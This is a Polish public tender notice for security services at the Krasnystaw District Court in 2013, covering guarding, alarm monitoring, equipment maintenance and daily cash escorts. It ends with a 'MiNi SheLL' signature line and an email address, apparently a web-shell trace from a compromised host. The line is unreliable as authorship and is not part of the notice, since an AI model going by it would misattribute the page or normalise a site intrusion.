<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usłui bezpośredniej ochrony fizycznej osób i mienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
1. świadczenie usług bezpośredniej ochrony fizycznej osób i mienia Sądu Rejonowego w Krasnymstawie, ul. Poniatowskiego 31, w okresie od 01 stycznia 2013 r. do 31 grudnia 2013 r. Usługa świadczona będzie w sposób ciągły, w poniedziałki w godzinach od 7:00 do 18:00, zaś od wtorku do piątku w godzinach od 7:00 do 16:00, pięć dni w tygodniu. Przez okres realizacji zamówienia usługa ta wykonywana będzie przez dwóch licencjonowanych pracowników ochrony fizycznej Wykonawcy świadczącego usługi w zakresie ochrony osób i mienia, spełniającego wymogi określone w ustawie z dnia 22 sierpnia 1997 r. o ochronie osób i mienia  (tj. Dz. U. z 2005 r. Nr 145, poz. 1221 z późn. zm.). Dobowy wymiar czasu pracy każdego z nich nie Będzie przekraczał 8 godzin i będzie przedstawiał się w sposób następujący:
a) w poniedziałki:
- jeden pracownik ochrony w godzinach 7:00 - 15:00,
- drugi pracownik ochrony  godzinach 10:00 - 18:00,
b) od wtorku do piątku:
- jeden pracownik ochrony w godzinach 7:00 - 15:00,
- drugi pracownik ochrony  godzinach 8:00 - 16:00.
 2. Pracowników ochrony winna cechować wysoka kultura osobista, miła powierzchowność, pozytywne nastawienie do otoczenia, odpowiednia sprawność fizyczna, umiejętność działania w dyskretny, niekolidujący z funkcjonowaniem jednostki sposób, komunikatywność oraz odpowiednia prezencja (estetyczne i funkcjonalne umundurowanie).  
3. Szczegółowy zakres czynności objętych usługą ochrony obejmuje:
1) działanie mające na celu zapewnienie bezpieczeństwa życia, zdrowia i nietykalności osobistej pracowników Zamawiającego i innych osób znajdujących się na terenie obiektu,
2) działania zapobiegające przestępstwom i wykroczeniem przeciwko mieniu, w szczególności włamaniom, kradzieżom lun innym formom wyprowadzania mienia poza strefę kontrolowaną, przeciwdziałanie powstaniu szkody wynikającej z tych zdarzeń,
3) kontrolowanie osób wchodzących i wychodzących do lub z budynku, ich bagaży, wnoszonych urządzeń i sprzętu, identyfikatorów, nie wpuszczanie do budynku osób będących pod wpływem alkoholu lub środków odurzających,
4) obserwowanie sygnalizatorów powstania alarmu, a w przypadku jego zaistnienia udanie się do miejsca, z którego został wywołany alarm i zapewnienie tam bezpieczeństwa, Wykonawca powinien na bieżąco informować o zaistniałych zdarzeniach, zarówno z central alarmowych jak i przeciwpożarowych odpowiednio Policję, Straż Pożarną lub inne służby oraz odnotować to w dzienniku służby; 
5) obsługę systemów alarmowych tj. kontrolowanie monitorów i nagrywanie obrazów ze wszystkich kamer za pomocą urządzeń rejestrujących obraz oraz archiwizowanie nagrania rejestratorów cyfrowych przez okres 30 dni;
6) ochrona parkingu wraz ze znajdującymi się na nim pojazdami, w tym również kontrolowanie czy na terenie parkingu nie znajdują się pojazdy nieuprawnione do parkowania,
7) stałe prewencyjne obchody obiektu, wszystkich korytarzy, klatek schodowych oraz terenu wokół budynku,   
8) udzielanie informacji interesantom i kierowanie ich do właściwych komórek organizacyjnych,
9) ochrona obiektu przed wszystkimi działaniami niepożądanymi, zwłaszcza ze strony osób trzecich, a w szczególności zapobieganie zakłóceniom porządku, zbiegowiskom i działaniom osób zakłócających pracę, kontrola pod względem możliwości wyrządzania szkód, tj. sabotażu, aktów samowoli itp.,
10) natychmiastowe działanie w/w przypadkach,
11) po zakończeniu pracy Zamawiającego sprawdzenie wszystkich korytarzy, wejść i wyjść i ustalenie, czy na terenie obiektu nie pozostały osoby nieupoważnione,
12) dokonywanie zatrzymań osób schwytanych na gorącym uczynku przestępstwa albo podejrzanych o popełnieni przestępstwa na terenie obiektu, jeżeli zachodzi obawa ucieczki, zatarcia śladów  lub nie jest ustalona tożsamość tych osób. Zatrzymanie może odbyć się wyłącznie w celu bezzwłocznego przekazania odpowiednim organom,
13) niezwłoczne informowanie upoważnionych pracowników Zamawiającego o wszelkich zdarzeniach zaistniałych na terenie obiektu,
14) prowadzenie książki dozoru i raportów z przebiegu służby, w sposób umożliwiający stwierdzenie godziny rozpoczęcia i zakończenia dyżuru przez każdą osobę świadczącą usługi ochrony osób i mienia.
4. Obowiązki pracownika ochrony.
Pracownik ochrony zobowiązany jest:
1) stawić się w pracy w stanie gwarantującym należyte wykonanie obowiązków,
2) nosić w widocznym miejscu identyfikator służbowy i napis -OCHRONA-,
3) wobec osób trzecich zachowywać się powściągliwie i bez poufałości,
4) interweniować stanowczo, nie przekraczając ogólnie przyjętych norm taktu i kultury,
5) pełnić służbę w wyznaczonym miejscu i czasie,
6) wykonywać powierzone czynności z należytą starannością,
7) działać zgodnie z obowiązującymi przepisami prawa.
Kategorycznie zabrania się w czasie służby:
1) spożywania alkoholu,
2) przystępowania do służby po spożyciu alkoholu,
3) informowania osób postronnych o przebiegu służby i o zaistniałych zdarzeniach,
4) podejmowania podczas służby towarzyskich rozmów i dyskusji z innymi pracownikami sądu. 
5. Zamawiający zapewni pracownikom ochrony zatrudnionym przez Wykonawcę dostęp do pomieszczenia socjalnego w miejscu wykonywania zamówienia oraz możliwość korzystania z linii telefonicznej w celach związanych z wykonywaniem zamówienia.
6. Wymagania szczególne dotyczące pracowników ochrony:
- pracownicy ochrony winni być wyposażeni w środki przymusu bezpośredniego  i środki łączności bezpośredniej,
- wszyscy pracownicy ochrony zatrudnienie na potrzeby wykonywania niniejszego zamówienia winni być umundurowani w sposób schludny, jednolity i wyposażeni w imienny identyfikator.
7. Wykonawca zapewni zastępstwo służb ochrony w przypadku zwolnień lekarskich i urlopów, przedstawiając Zamawiającemu do akceptacji dane dotyczące pracownika ochrony pełniącego zastępstwo..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 79.71.50.00-9, 98.34.11.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Monitorowanie i rejestracja pracy systemów SWiN i SAP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi monitorowania i rejestracji pracy systemów sygnalizacji włamania i napadu (SSWiN), oraz  sygnalizacji pożaru (SAP) działającego w Sądzie Rejonowym w Krasnymstawie za pośrednictwem łączy telefonicznych lub radiowych. Zamawiający posiada jeden system sygnalizacji włamania i napadu oraz jedną centralę pożarową. 
Wykonawcy zostanie powierzony obowiązek monitorowania do własnego centrum monitorowania alarmów, sygnału z systemów SSWiN i  alarmów pożarowych SAP. Usługa ta winna być świadczona całodobowo. 
W przypadku odebrania sygnału alarmowego Wykonawca będzie zobowiązany wysłać niezwłocznie na teren obiektu grupę interwencyjną. Przyjazd grupy interwencyjnej powinien nastąpić w czasie nie dłuższym niż 15 minut. Zadaniem grupy interwencyjnej jest przyjazd do obiektu i przerwanie działalności przestępczej na terenie obiektu. 
W przypadku odebrania sygnał alarmowego z systemu sygnalizacji pożaru, Wykonawca powinien potwierdzić jego autentyczność i w przypadku zaistnienia zagrożenia pożarowego powiadomić Straż Pożarną i kierownika Oddziału Administracyjnego. Prace związane z ochrona przeciwpożarową powinny być świadczone zgodnie z ustawą z dnia 24 sierpnia 1991 r. o ochronie przeciwpożarowej (tj. Dz. U. z 2009 r. Nr 178, poz. 1380 z późn. zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 79.71.50.00-9, 98.34.11.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa zabezpieczenia technicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa zabezpieczenia technicznego polegająca na konserwacji systemów: sygnalizacji włamania i napadu (SSWiN), systemu monitorowania wizyjnego (CCTV), systemu sygnalizacji alarmu pożarowego (SAP) oraz urządzeń w postaci detektora metalu - bramki METEOR 200, SN 384518 oraz ręcznego detektora metalu PD-140.  
Konserwacja powinna obejmować swym zakresem okresowe przeglądy w/w systemów oraz urządzeń i powinna być przeprowadzona przez osobę posiadającą licencję dotyczącą zabezpieczenia technicznego i polegać między innymi na oględzinach zewnętrznych oraz sprawdzeniu poprawności i skuteczności działania. Z uwagi na to, że Zamawiający nie znajduje się ewidencji obszarów i urządzeń podlegających obowiązkowej ochronie w świetle przepisów ustawy z dnia 22 sierpnia 2002 r. o ochronie osób i mienia (Dz. U. z 2005 r. Nr 145, poz. 1221z późn. zm.), Zamawiający nie wymaga aby Wykonawca posiadał koncesję na ochronę osób i mienia w zakresie zabezpieczenia technicznego. 
Z przeprowadzonych przeglądów konserwacyjnych Wykonawca będzie zobowiązany sporządzić protokół stwierdzający stan techniczny systemów i urządzeń. Przeglądy powinny być przeprowadzone w terminach:
a) do 31 stycznia 2013 r.
b) do 30 kwietnia 2013 r.
c) do 31 lipca 2013 r.
d) do 31 października 2013 r. 
Protokoły z przeglądów konserwacyjnych powinny być przedstawione kierownikowi Oddziału Administracyjnego najpóźniej do  dnia 15-go następnego miesiąca, w którym dokonano przeglądu. Niedotrzymanie w/w terminów będzie traktowane przez Zamawiającego jako niedotrzymanie warunków umowy. Stwierdzone uszkodzenia lub nieprawidłowości w działaniu systemów  lub urządzeń może nastąpić podczas przeprowadzania konserwacji lub normalnej, codziennej eksploatacji. Po otrzymaniu informacji o nieprawidłowym działaniu któregokolwiek z systemów alarmowych, Wykonawca powinien stwierdzić przyczynę nieprawidłowości, usunąć ją lub przedstawić kosztorys naprawy. Naprawa uszkodzenia nastąpi po zapoznaniu się z kosztorysem, jego zaakceptowaniu i ewentualnym zleceniu wykonania naprawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 79.71.50.00-9, 98.34.11.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługi konwojowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi konwojowe polegające na codziennym konwojowaniu kasjera z gotówką z budynku Sądu Rejonowego w Krasnymstawie, ul. Poniatowskiego 31, do Banku PeKaO S.A. Oddział w Krasnymstawie, ul. Piłsudskiego 11 (odległość ok. 1 km) i z powrotem, od poniedziałku do piątku o ustalonej godzinie. 
Wysokość transportowanych wartości pieniężnych nie przekroczy 0,04 jednostki obliczeniowej, o której mówi § 1 pkt 5 rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 14 października 1998 r. w sprawie szczegółowych zasad i wymagań, jakim powinna odpowiadać ochrona wartości pieniężnych przechowywanych i transportowanych przez przedsiębiorców i inne jednostki organizacyjne (Dz. U. Nr 129, poz. 858 z późn. zm.). 
Do obowiązków konwojującego pracownika ochrony należy zapewnienie kasjerowi bezpieczeństwa (ochrona przed kradzieżą, rabunkiem, zniszczeniem i zaginięciem) od chwili przyjęcia opieki nad kasjerem i mieniem do momentu przekazania go w miejscu przeznaczenia. Przewidywana ilość konwojów w ciągu 12 miesięcy - 251, przy czym zamawiający zastrzega sobie możliwość zmniejszenia ilości usług o 10%..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 79.71.50.00-9, 98.34.11.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com